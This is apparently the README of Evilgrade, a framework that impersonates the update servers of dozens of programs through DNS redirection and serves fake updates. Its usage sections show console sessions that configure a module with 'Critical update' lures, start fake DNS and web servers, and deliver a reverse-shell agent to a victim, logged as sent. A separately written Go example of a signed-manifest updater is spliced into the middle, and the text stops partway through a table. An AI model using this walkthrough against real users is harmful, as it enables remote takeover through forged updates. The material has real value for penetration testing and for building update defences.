Evilgrade
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.
.:: [BRIEF OVERVIEW] ::.
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has its own WebServer and DNSServer modules. New settings are easy to set up, and modules autoconfigure when new binary agents are set.
* When should I use evilgrade?
This framework comes into play when the attacker is able to redirect hostnames (manipulate the victim's DNS traffic), which can be done in two scenarios:
Internal scenario:
- Internal DNS access
- ARP spoofing
- DNS Cache Poisoning
- DHCP spoofing
- TCP hijacking
- Wi-Fi Access Point impersonation
External scenario:
- Internal DNS access
- DNS Cache Poisoning
* How does it work?
Evilgrade works with modules; each module implements the structure needed to emulate a fake update for a specific application/system.
* What OS are supported?
ISR-Evilgrade is cross-platform; it only depends on having an appropriate payload for the target platform to be exploited.
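The "poor upgrade implementation" the framework relies on is an updater that trusts whatever host DNS resolves to. The following is an added example, not part of evilgrade or of any product it targets: a minimal signed-manifest updater in Go where the client verifies the manifest against a key pinned in the binary, rejects replayed older releases, and checks the payload hash before anything is installed, so a redirected update host cannot substitute its own agent. The Manifest format, GenKey/SignRelease/Verify helpers and the sequence counter are assumptions made for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
)

// Manifest is a hypothetical update descriptor; the publisher signs its JSON form.
type Manifest struct {
	Seq    uint64 `json:"seq"`    // monotonic release counter, blocks rollback/replay
	SHA256 string `json:"sha256"` // hex digest of the payload bytes
}

// GenKey: private half stays with the publisher, public half is compiled into the client.
func GenKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader) // crypto/rand does not fail in practice
	return pub, priv
}
// SignRelease builds the manifest for a payload and signs it (publisher side).
func SignRelease(priv ed25519.PrivateKey, seq uint64, payload []byte) ([]byte, []byte) {
	sum := sha256.Sum256(payload)
	data, err := json.Marshal(Manifest{Seq: seq, SHA256: hex.EncodeToString(sum[:])})
	if err != nil {
		panic(err)
	}
	return data, ed25519.Sign(priv, data)
}

// Verify is the client side: signature against the pinned key first, then rollback, then hash.
func Verify(pub ed25519.PublicKey, data, sig []byte, installedSeq uint64, payload []byte) (*Manifest, error) {
	if !ed25519.Verify(pub, data, sig) {
		return nil, errors.New("manifest signature invalid")
	}
	var m Manifest
	if err := json.Unmarshal(data, &m); err != nil {
		return nil, err
	}
	if m.Seq <= installedSeq {
		return nil, errors.New("rollback or replayed manifest rejected")
	}
	sum := sha256.Sum256(payload)
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return nil, errors.New("payload hash mismatch")
	}
	return &m, nil
}
```

Because the public key is embedded in the client rather than fetched, no DNS answer changes whom the client trusts; the update host only ever delivers bytes that must verify.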
Implemented modules:
- Freerip 3.30
- Jet photo 4.7.2
- Teamviewer 5.1.9385
- ISOpen 4.5.0
- Istat.
- Gom 2.1.25.5015
- Atube catcher 1.0.300
- Vidbox 7.5
- Ccleaner 2.30.1130
- Fcleaner 1.2.9.409
- Allmynotes 1.26
- Notepad++ 5.8.2
- Java 1.6.0_22 winxp/win7
- aMSN 0.98.3
- Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
- Mirc 7.14
- Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
- Dap 9.5.0.3
- Winscp 4.2.9
- AutoIt Script 3.3.6.1
- Clamwin 0.96.0.1
- AppTapp Installer 3.11 (Iphone/Itunes)
- getjar (facebook.com)
- Google Analytics Javascript injection
- Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
- Winamp 5.581
- TechTracker (cnet) 1.3.1 (Build 55)
- Nokiasoftware firmware update 2.4.8es - (Windows software)
- Nokia firmware v20.2.011
- BSplayer 2.53.1034
- Apt ( < Ubuntu 10.04 LTS)
- Ubertwitter 4.6 (0.971)
- Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
- Cpan 1.9402
- VirtualBox (3.2.8 )
- Express talk
- Filezilla
- Flashget
- Miranda
- Orbit
- Photoscape.
- Panda Antirootkit
- Skype
- Sunbelt
- Superantispyware
- Trillian <= 5.0.0.26
- Adium 1.3.10 (Sparkle Framework)
- VMware
- more...
- /docs/CHANGES
.:: [MAIN USAGE] ::.
It works similarly to an IOS console.
evilgrade>help
Type 'help command' for more detailed help on a command.
Commands:
configure - Configure <module-name> - no help available
exit - exits the program
help - prints this screen, or help on 'command'
reload - Reload to update all the modules - no help available
restart - Restart webserver - no help available
set - Configure variables - no help available
show - Display information of <object>.
start - Start webserver - no help available
status - Get webserver status - no help available
stop - Stop webserver - no help available
version - Display framework version. - no help available
Object:
options - Show options of current module.
vhosts - Show VirtualHosts of current module.
modules - List all modules available for use.
active - Show active modules.
List implemented modules
evilgrade>show modules
List of modules:
===============
...
...
...
- 63 modules available.
Configure a specified module
evilgrade>conf sunjava
evilgrade(sunjava)>
Show all VirtualHosts.
VirtualHost field contains the domains that our webserver is going to emulate for us.
evilgrade>show vhosts
Virtual hosts:
=============
[
"java.sun.com",
"javadl-esd.sun.com",
...
...
...
]
Show options of current module.
agent: This is our fake update binary. We have to set the path to where it's located, or implement dynamic fake update binary generation (see ADVANCED).
evilgrade(sunjava)>show options
Display options:
===============
Name = Sun Microsystems Java
Version = 2.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "java.sun.com|javadl-esd.sun.com"
.-------------------------------------------------------------------------------------------------------------------------.
| Name | Default | Description |
+--------------+-------------------------------------------------+--------------------------------------------------------+
| website | http://java.com/moreinfolink | Website displayed in the update |
| enable | 1 | Status |
| atitle | Critical vulnerability | Title name to be displayed in the systray item popup |
| arg | | Arg passed to Agent |
| adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup |
| description | This critical update fix internal vulnerability | Description to be displayed during the update |
| agent | ./agent/reverseshellsign.exe | Agent to inject |
| title | Critical update | Title name displayed in the update |
'--------------+-------------------------------------------------+--------------------------------------------------------'
Start services (DNS Server and WebServer)
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#### Waiting for victims
evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"
Show status and victims logs
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client | Module | Status | Md5,Cmd,File |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |
'----------------+------------------+--------+------------------------------------------------------------------'
.:: [DEEP USAGE] ::.
Commands
configure / conf - Configure <module-name>
Example:
evilgrade>configure sunjava
evilgrade(sunjava)>
evilgrade>conf sunjava
evilgrade(sunjava)>
## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>
##
reload - Reload all modules (refreshes loaded modules; useful during development)
start - Start webserver
stop - Stop webserver (fake update server)
Example:
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#######################################
Example:
-------
evilgrade>stop
Stopping WEBSERVER [OK]
Stopping DNSSERVER [OK]
#######################################
restart - Restart services (WebServer and DNS Server)
stops and starts again
#######################################
status - Get webserver and victims status
Example:
-------
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client | Module | Status | Md5,Cmd,File |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |
'----------------+------------------+--------+------------------------------------------------------------------'
#######################################
show - Display information of <object>.
#######################################
show active - Display active modules in the webserver
#######################################
show modules - Display implemented modules
#########################################
show options - Display modules/global options
Example:
-------
evilgrade>show options
Display options:
===============
.-----------------------------------------------------------------------------------.
| Name | Default | Description |
+-------------+-----------+------------------